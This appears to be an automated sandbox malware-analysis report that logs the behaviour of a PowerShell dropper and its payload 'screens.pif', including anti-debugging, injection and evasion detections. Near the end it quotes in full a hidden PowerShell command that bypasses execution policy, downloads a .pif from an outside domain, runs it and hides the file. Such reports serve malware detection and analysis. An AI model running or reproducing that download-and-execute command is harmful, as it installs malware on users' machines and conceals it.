Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 2CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 5490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 6490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 65C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 75C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 7950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 8950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 9950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: ABD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: BBD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: C060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: D070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 5490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 65C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 7950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 8950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Memory allocated: 9950000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4443			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5362			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif TID: 6328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif TID: 748	Thread sleep time: -1380000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Thread delayed: delay time: 60000	Jump to behavior

Source: powershell.exe, 00000000.00000002.1542511922.000002783CF77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWWi%SystemRoot%\system32\mswsock.dll\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows6
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: screens.pif, 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\screens.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]

5_2_0040317B

Source: C:\Users\user\Desktop\screens.pif

Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,

5_2_00402B7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\screens.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7360.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: unknown

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\screens.pif

Memory written: C:\Users\user\Desktop\screens.pif base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\screens.pif "C:\Users\user\Desktop\screens.pif"	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif	Jump to behavior
Source: C:\Users\user\Desktop\screens.pif	Process created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -hidden -command ddisplay.dll;(new-object system.net.webclient).downloadfile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbafrawyegfyaugeygywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').attributes += 'hidden';

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
